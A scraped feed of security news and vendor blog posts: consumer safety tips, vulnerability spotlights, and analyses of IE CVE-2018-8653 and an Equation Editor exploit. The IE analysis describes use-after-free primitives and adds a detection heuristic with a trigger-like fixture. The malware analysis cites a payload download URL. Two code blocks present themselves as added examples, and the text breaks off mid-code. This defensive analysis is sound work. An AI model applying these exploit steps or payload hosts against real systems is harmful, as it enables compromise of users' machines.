The rest of the news


  • Cisco Duo recently launched a new service, CRXcavator, to scan Google Chrome extensions. It serves customers and users by scanning the Chrome store and then delivering reports on individual extensions based on the permissions they require and the potential use of those permissions.
  • Google is under fire for allegedly forgetting to inform users of a microphone inside of its Nest smart hub. While the company says it was never supposed to be a secret, users, security researchers and even politicians now are questioning why the microphone was installed in the first place. 
    • Talos Take: "To be clear, because some news outlets have reported this microphone as being present in the Nest THERMOSTAT. It is NOT present in the thermostat, it’s present in the Smart Hub, which is the centerpiece of their home security solution," Joel Esler, senior manager, Communities Division.


New Flaws Re-Enable DMA Attacks On Wide Range of Modern Computers

Security researchers have discovered a new class of security vulnerabilities that impacts all major operating systems, including Microsoft Windows, Apple macOS, Linux, and FreeBSD, allowing attackers to bypass protection mechanisms introduced to defend against DMA attacks. Known for years, Direct memory access (DMA)-based attacks let an attacker compromise a targeted computer in a matter of

Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability


Aleksandar Nikolic of Cisco Talos discovered this vulnerability.

Executive summary

Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0714)

Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294

Apple Users: Here’s What to Do About the Major FaceTime Bug

FaceTime is a popular way for people of all ages to connect with long-distance loved ones. The feature permits Apple users to video chat with other device owners from essentially anywhere at any time. And now, a bug in the software takes that connection a step further – as it permits users calling via FaceTime to hear the audio coming from the recipient’s phone, even before they’ve accepted or denied the call.

Let’s start with how the eavesdropping bug actually works. First, a user would have to start a FaceTime video call with an iPhone contact and while the call is dialing, they must swipe up from the bottom of the screen and tap “Add Person.” Then, they can add their own phone number to the “Add Person” screen. From there, the user can start a group FaceTime call between themselves and the original person dialed, even if that person hasn’t accepted the call. What’s more – if the user presses the volume up or down, the victim’s front-face camera is exposed too.

This bug acts as a reminder that these days your smartphone is just as data rich as your computer. So, as we adopt new technology into our everyday lives, we all must consider how these emerging technology trends could create security risks if we don’t take steps to protect our data.

Therefore, it’s crucial all iOS users that are running iOS 12.1 or later take the right steps now to protect their device and their data. If you’re an Apple user affected by this bug, be sure to follow these helpful security steps:

  • Update, update, update. Speaking of fixes – patches for bugs are included in software updates that come from the provider. Therefore, make sure you always update your device as soon as one is available. Apple has already confirmed that a fix is underway as we speak.
  • Be sure to disable FaceTime in iOS settings now. Until this bug is fixed, it is best to just disable the feature entirely to be sure no one is listening in on you. When a fix does emerge from Apple, you can look into enabling the service again.
  • Apply additional security to your phone. Though the bug will hopefully be patched within the next software update, it doesn’t hurt to always cover your device with an extra layer of security. To protect your phone from any additional mobile threats coming its way, be sure to use a security solution such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Apple Users: Here’s What to Do About the Major FaceTime Bug appeared first on McAfee Blogs.

The Collection #1 Data Breach: Insights and Tips on This Cyberthreat

As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the Equifax data breach, a new monster breach now has to become top of mind for us all. Say hello to Collection #1, a data set exposing 772,904,991 unique email addresses and over 21 million unique passwords.

Discovered by security researcher Troy Hunt, Collection #1 first appeared on the popular cloud service called MEGA. The Collection #1 folder held over 12,000 files that weigh in at over 87 gigabytes. When the storage site was taken down, the folder was then transferred to a public hacking site. What’s truly astonishing about this is that the data was not for sale; it was simply available for anyone to take.

You may be wondering, how was all this data collected? It appears that this data set is a breach of breaches, aggregating over 2,000 leaked databases containing cracked passwords in order to achieve maximum exposure. The sheer volume of this breach makes Collection #1 the second largest in size after Yahoo, and the largest public breach ever (given the data was openly exposed on the internet).

It appears that this data set is designed for use in credential-stuffing attacks, where cybercriminals will use email and password combinations to hack into consumers’ online accounts. The risks could be even greater for those who reuse credentials across multiple accounts. In order to help protect yourself from this threat, it’s vital that users act fast and use the following tips to help protect their data:

  • Use strong, unique passwords. In addition to making sure all of your passwords are strong and unique, never reuse passwords across multiple accounts. You can also enable a password manager to help keep track of your credentials.
  • Change your passwords. Even if it doesn’t appear that your data was breached, it’s better to err on the side of caution and change all of your passwords to better protect yourself.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Collection #1 Data Breach: Insights and Tips on This Cyberthreat appeared first on McAfee Blogs.

Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts

Epic Games’ Fortnite has risen in popularity rapidly since its debut, and cybercriminals have leveraged that popularity to enact a handful of malicious schemes. Unfortunately, these tricks are showing no signs of slowing, as researchers recently discovered a security flaw that allowed cybercriminals to take over a gamer’s Fortnite account through a malicious link. This attack specifically targeted users who used a third-party website to log in to their Fortnite accounts, such as Facebook, Google, or gaming providers like Microsoft, Nintendo, and Sony. But instead of trying to steal a gamer’s password like many of the hacks we’ve seen, this scheme targeted the special access token the third-party website exchanges with the game when a user logs in.

So, how exactly does this threat work? First, a cybercriminal sends a malicious phishing link to a Fortnite user. To increase the likelihood that a user will click on the link, the cybercriminal would send the link with an enticing message promising perks like free game credits. If the user clicked on the link, they would be redirected to the vulnerable login page. From here, Epic Games would make the request for the SSO (single sign-on) token from the third-party site, given SSO allows a user to leverage one set of login credentials across multiple accounts. This authentication token is usually sent to Fortnite over the back-end, removing the need for the user to remember a password to access the game. However, due to the unsecured login page, the user would be redirected to the attacker’s URL. This allows cybercriminals to intercept the user’s login token and take over their Fortnite account.

After acquiring a login token, a cybercriminal would gain access to a Fortnite user’s personal and financial details. Because Fortnite accounts have partial payment card numbers tied to them, a cybercriminal would be able to make in-game purchases and rack up a slew of charges on the victim’s card.

It’s important for players to understand the realities of gaming security in order to be more prepared for potential cyberthreats such as the Fortnite hack. According to McAfee research, the average gamer has experienced almost five cyberattacks, with 75% of PC gamers worried about the security of gaming. And while Epic Games has thankfully fixed this security flaw, there are a number of techniques players can use to help safeguard their gaming security now and in the future:

  • Go straight to the source. 70% of breaches start with a phishing email. And phishing scams can be stopped by simply avoiding the email and going straight to the source to be sure you’re working with the real deal. In the case of this particular scheme, you should be able to check your account status on the Fortnite website and determine the legitimacy of the request from there.
  • Use a strong, unique password. If you think your Fortnite account was hacked, err on the side of caution by updating your login credentials. In addition, don’t reuse passwords over multiple accounts. Reusing passwords could allow a cybercriminal to access multiple of your accounts by just hacking into one of them.
  • Stay on top of your financial transactions. Check your bank statements regularly to monitor the activity of the card linked to your Fortnite account. If you see repeat or multiple transactions from your account, or see charges that you don’t recognize, alert your bank to ensure that your funds are protected.
  • Get protection specifically designed for gamers. We’re currently building McAfee Gamer Security to help boost your PC’s performance, while simultaneously safeguarding you from a variety of threats that can disrupt your gaming experience.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.

The post Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts appeared first on McAfee Blogs.

IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.

Context

Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure countermeasures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited.

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE-2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.

When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

Using the popular diffing tool Diaphora, we compared the unpatched and patched versions of jscript.dll for Windows 10, 64-bit edition (feature version 1809).

We can see that only a few functions were modified. All but one point to array-related functions. Those were probably patches addressing CVE-2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only one remaining that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in IDA Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code that the compiler had inlined into that function in the older version of the DLL.

In the newer version of the DLL, this function is called twice; while in the unpatched version, the code was called only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to notice the magic offset 0x3D0 to see if this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left):

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually designate a template that keeps track of references pointing to the object being used, so that those objects are not garbage collected. Here it looks as though we are saving stack addresses (aka local variables) into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers are at those specific locations on the stack. In hindsight this makes sense; we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scenes. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), then it invokes a virtual function that returns true/false depending on whether the object can be called. On the other hand, if the type is not 0x81, a different path is followed; it tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:

Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.
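As a defender-side complement to the analysis above and to this proof-of-concept walkthrough, the following triage heuristic flags scripts in which the primitives the post names co-occur: Enumerator called on a JavaScript array, item(), an overwritten prototype carrying a custom isPrototypeOf callback, an instanceof check, the prototype being set to null, and an explicit garbage-collection trigger. This is an added example, not McAfee's code or detection content; the indicator weights, the threshold and both sample scripts are constructed for it, and CollectGarbage() is assumed to be the JScript built-in used to force a collection.

```python
import re

# Each indicator is (name, compiled regex, weight). The patterns correspond to
# the primitives named in the analysis: Enumerator called on a JavaScript
# array, Enumerator.prototype.item(), an overwritten "prototype" member holding
# a custom isPrototypeOf callback, an instanceof check that reaches that
# callback, the prototype set to null inside it, and an explicit garbage
# collection (CollectGarbage is the JScript built-in; assumption for this
# example). Each construct is legitimate on its own; the score only becomes
# meaningful when several of them appear together in one script.
INDICATORS = [
    ("enumerator_ctor",      re.compile(r"\bnew\s+Enumerator\s*\("), 1),
    ("enumerator_item",      re.compile(r"\.item\s*\("), 1),
    ("prototype_overwrite",  re.compile(r"\.prototype\s*=\s*\{"), 2),
    ("custom_isPrototypeOf", re.compile(r"\bisPrototypeOf\s*[:=]\s*function\b"), 3),
    ("instanceof_use",       re.compile(r"\binstanceof\b"), 1),
    ("prototype_nulled",     re.compile(r"\.prototype\s*=\s*null\b"), 2),
    ("explicit_gc",          re.compile(r"\bCollectGarbage\s*\("), 2),
]

# Scripts scoring at or above this are worth a manual look or a sandbox run.
# The threshold is a triage choice made for this example, not a vendor setting.
THRESHOLD = 6


def scan_script(source: str) -> dict:
    """Count indicator hits in a script body and return a weighted score.

    Returns {"score": int, "hits": {indicator_name: occurrence_count}}; only
    indicators that matched at least once are listed under "hits". Obfuscated
    scripts (string building, eval) defeat plain regexes, so treat the score as
    a triage signal, not a verdict.
    """
    hits = {}
    score = 0
    for name, pattern, weight in INDICATORS:
        count = len(pattern.findall(source))
        if count:
            hits[name] = count
            score += weight  # weight counted once per indicator, not per hit
    return {"score": score, "hits": hits}


def is_suspicious(source: str) -> bool:
    """True when enough of the CVE-2018-8653 primitives appear together."""
    return scan_script(source)["score"] >= THRESHOLD


# Constructed sample: ordinary use of Enumerator over an ActiveX collection,
# the kind of legitimate script the heuristic must not flag.
BENIGN_SAMPLE = """
var fso = new ActiveXObject("Scripting.FileSystemObject");
var e = new Enumerator(fso.Drives);
for (; !e.atEnd(); e.moveNext()) {
    WScript.Echo(e.item().DriveLetter);
}
"""

# Constructed sample: the primitives the post describes, assembled only so the
# indicators co-occur. It is a detection fixture, not a working trigger.
SUSPICIOUS_SAMPLE = """
var e = new Enumerator([new RegExp(), new RegExp()]);
var eObj = e.item();
eObj.prototype = { isPrototypeOf: function (o) { return true; } };
if ({} instanceof eObj) {
    eObj.prototype = null;
    CollectGarbage();
}
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        result = scan_script(sample)
        print(f"{label}: score={result['score']} flagged={is_suspicious(sample)} "
              f"hits={result['hits']}")
```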

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.

Conclusion

CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL, its design, and its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to, such as advertisers and website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!


The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

Evading Static Analyzers by Solving the Equation (Editor)

Introduction

As part of our efforts to self-evaluate our backend systems, we closely monitor the behavioral reports produced by our dynamic analysis system. Every detection is, in fact, cross-checked and correlated with several other pieces of information, including the output from a number of static analyzers.

A few weeks ago a small anomaly started to creep in when analyzing malicious documents: executions spawning a rogue Equation Editor process (often linked to arbitrary code execution) were no longer triggering our internal static analyzers. It was as if the malicious documents were leveraging a new CVE, possibly just added to a well-maintained document exploit builder (for instance the old Phantom exploit builder kit, or the Metasploit framework).

One of the malicious documents (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a) was obfuscated but the process snapshot was still clearly showing the exploitation of the same buffer overflow used by CVE-2017-11882. However, the header of the OLE object (as extracted by rtfobj) was clearly different.


Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882 and cf63479cefc4984309e97ed71e34a078cbf21d6a.

This quickly explained why the static analyzer didn’t assert detection of the known CVE: the strings commonly used to detect CVE-2017-11882 rely on either the class name or some other byte sequence that, as shown in Figure 1, is now clearly missing. At this point, we decided to analyze the document in more detail.

OLE Object Analysis

The OLE object (as extracted by RTFScan and viewed by SS viewer) clearly shows that even its stream type is somewhat generic (normally an Equation Editor OLE object contains an EquationNative stream, as further explained here). Instead, the OLE stream is parsed as the more obscure Ole10Native (see Figure 2).

Figure 2: An OLE object featuring an Ole10Native stream.


There are two interesting things happening here: (i) Equation Editor is still invoked to process the OLE object regardless of the OLE format, and (ii) Equation Editor is able to parse this new and generic format. As we show in Figure 3, the first is achieved because the CLSID is also specified inside the OLE object itself (the reader can find a nice walkthrough on how this is done here).

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.


As for the stream itself, its type is not something we see every day. Equation Editor, on the other hand, seems to know this format quite well, and in fact it parses the object without raising any issue: it selectively reads and tests specific bytes (the first and third byte of the MTEF header and the first two of the TYPESIZE header), and if some specific values are found (as shown in Figure 4), Equation Editor is finally convinced to parse the FONT record as well, triggering once again the same buffer overflow that is normally exploited in CVE-2017-11882.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.


Shellcode Analysis

The vulnerability exploited to execute the shellcode is indeed CVE-2017-11882; as soon as the FONT record is parsed, the control flow is transferred to 0x445203.


At this address, a RET instruction will be executed to transfer control to the shellcode stored in a buffer located in lieu of the FONT record (this exact method of executing a shellcode is also used by CVE-2017-0802 and further explained here):

Figure 5: Shellcode stored as FONT name inside the FONT record.


The shellcode also uses an interesting way to find itself in memory. Unlike other malicious documents exploiting CVE-2017-11882, in our case the sample does not rely on the WinExecute API to divert execution. Rather, it searches the OLE stream itself to locate the entry point of the shellcode. To succeed, it needs the following three hardcoded values:

  • Address 0x0045BD3C: this address references an object that contains a pointer to another temporary structure (see Table 3 in the Appendix for more details). This temporary structure points to the beginning of the Ole10Native stream as loaded in memory.
  • Address 0x004667B0: this address points to the imported function GlobalLock.
  • 0x11F: the entry point in the shellcode from where it will start executing.

These three values are then used as follows:

  1. First, the shellcode retrieves the handle of the memory object from 0x0045BD3C.
  2. Then the handle so retrieved is passed as a parameter to the GlobalLock API.
  3. The pointer returned references the first byte of the OLE stream in memory. The shellcode now knows where it is residing in the memory and starts executing from StartOfShellcode+0x11F.

The sample goes on by downloading a file from hxxp://b.reich[.]io/hnepyp.scr, saving it on disk as name.exe, and executing it. In this report, we omit the analysis of this specific binary, as it is yet another pony variant. Were the reader interested, VirusTotal has a full report here (sha1: 2bcd81a9f077ff3500de9a80b469d34a53d51f4a); all IOCs are also listed in the Appendix, Table 1.

Why Static Analysis is not Enough

While in some cases static analysis can detect if a specific vulnerability is exploited, obfuscated samples often present quite a challenge even for the most sophisticated analyzer. In our case, a simple pattern match is not even possible: the only bits of information we can use to write a detection rule are the CLSID and the 5 bytes that are constant in the MathType OLE object (the OLE object used by Equation Editor).

A hypothetical static checker would need to:

  1. Extract the OLE object from the document
  2. Parse the OLE header and check if it is pointing to the Equation Editor CLSID
  3. Extract the Ole10Native stream
  4. Parse it and get the FONT record
  5. Check its actual length
  6. And finally, verify that the last four bytes of the buffer correspond to an address

This is not a trivial task if done statically, and overall impossible if only pattern matching is available (as it is the case if we are using YARA rules, for example). On the other hand, in Figure 6 we can see the full behavioral analysis when analyzing the sample dynamically.
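Putting the checker sketched above into code, as an added example that is not the blog's or Lastline's own tooling: it applies steps 2 and 4 to 6 to an already extracted OLE object and Ole10Native payload (extraction with rtfobj is assumed done) and also looks for the two addresses the shellcode hardcodes. The CLSID and the Table 2 header values come from the post; the record tags, the 36-byte buffer size, the image range and the sample bytes are assumptions.

```python
import struct

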